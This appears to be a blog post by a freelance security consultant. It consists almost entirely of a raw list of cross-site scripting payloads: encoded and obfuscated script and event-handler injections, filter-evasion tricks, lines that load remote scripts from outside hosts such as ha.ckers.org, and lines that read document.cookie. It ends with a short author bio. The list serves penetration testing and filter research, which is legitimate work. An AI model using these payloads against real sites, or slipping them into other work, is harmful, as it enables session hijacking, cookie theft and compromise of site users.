&lt;SCRIPT/XSS SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;IMG SRC=\”   javascript&#058;alert(‘XSS’);\”&gt;

perl -e ‘print \”&lt;SCR\0IPT&gt;alert(\\”XSS\\”)&lt;/SCR\0IPT&gt;\”;’ &gt; out

perl -e ‘print \”&lt;IMG SRC=java\0script&#058;alert(\\”XSS\\”)&gt;\”;’ &gt; out

&lt;IMG SRC=\”jav&#x0D;ascript&#058;alert(‘XSS’);\”&gt;

&lt;IMG SRC=\”jav&#x0A;ascript&#058;alert(‘XSS’);\”&gt;

&lt;IMG SRC=\”jav&#x09;ascript&#058;alert(‘XSS’);\”&gt;

&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;

&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;

&lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt;

&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;

&lt;IMG \”\”\”&gt;&lt;SCRIPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;\”&gt;

&lt;IMG SRC=`javascript&#058;alert(\”RSnake says, ‘XSS’\”)`&gt;

&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;

&lt;IMG SRC=JaVaScRiPt&#058;alert(‘XSS’)&gt;

&lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt;

&lt;IMG SRC=\”javascript&#058;alert(‘XSS’);\”&gt;

&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;

”;!–\”&lt;XSS&gt;=&{()}

‘;alert(String&#46;fromCharCode(88,83,83))//\’;alert(String&#46;fromCharCode(88,83,83))//\”;alert(String&#46;fromCharCode(88,83,83))//\\”;alert(String&#46;fromCharCode(88,83,83))//–&gt;&lt;/SCRIPT&gt;\”&gt;’&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;

‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

”;!–“<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=javascript:alert(‘XSS’)>

<IMG SRC=javascrscriptipt:alert(‘XSS’)>

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

<IMG SRC=” &#14;  javascript:alert(‘XSS’);”>

<SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<SCRIPT/SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

\”;alert(‘XSS’);//

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

<DIV STYLE=”background-image:\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029″>

<DIV STYLE=”width: expression(alert(‘XSS’));”>

<STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>

<IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>

<XSS STYLE=”xss:expression(alert(‘XSS’))”>

exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>

<EMBED SRC=”http://ha.ckers.org/xss.swf” AllowScriptAccess=”always”></EMBED>

a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e);

<SCRIPT SRC=”http://ha.ckers.org/xss.jpg”></SCRIPT>

<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”></BODY></HTML>

<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION

<form><button formaction=”javascript:alert(123)”>crosssitespt

<frameset onload=alert(123)>

<!–<img src=”–><img src=x onerror=alert(123)//”>

<style><img src=”</style><img src=x onerror=alert(123)//”>

<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>

<embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>

<embed src=”javascript:alert(1)”>

<? foo=”><script>alert(1)</script>”>

<! foo=”><script>alert(1)</script>”>

</ foo=”><script>alert(1)</script>”>

<script>({0:#0=alert/#0#/#0#(123)})</script>

<script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script>

<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script>

<script src=”#”>{alert(1)}</script>;1

<script>crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script>

<svg xmlns=”#”><script>alert(1)</script></svg>

<svg onload=”javascript:alert(123)” xmlns=”#”></svg>

<iframe xmlns=”#” src=”javascript:alert(1)”></iframe>

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert(’XSS’)>

<script>alert(1)</script>

“><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

<video src=1 onerror=alert(1)>

<audio src=1 onerror=alert(1)>

Shahrukh Rafeeq

I'm an Entrepreneur, Freelance Security Consultant, Bug Hunter having years of experience with a deep interest in InfoSec Industry. I love to speak and write about web and mobile application pen-testing, bug bounty. You can reach me at

Leave a Reply

Your email address will not be published.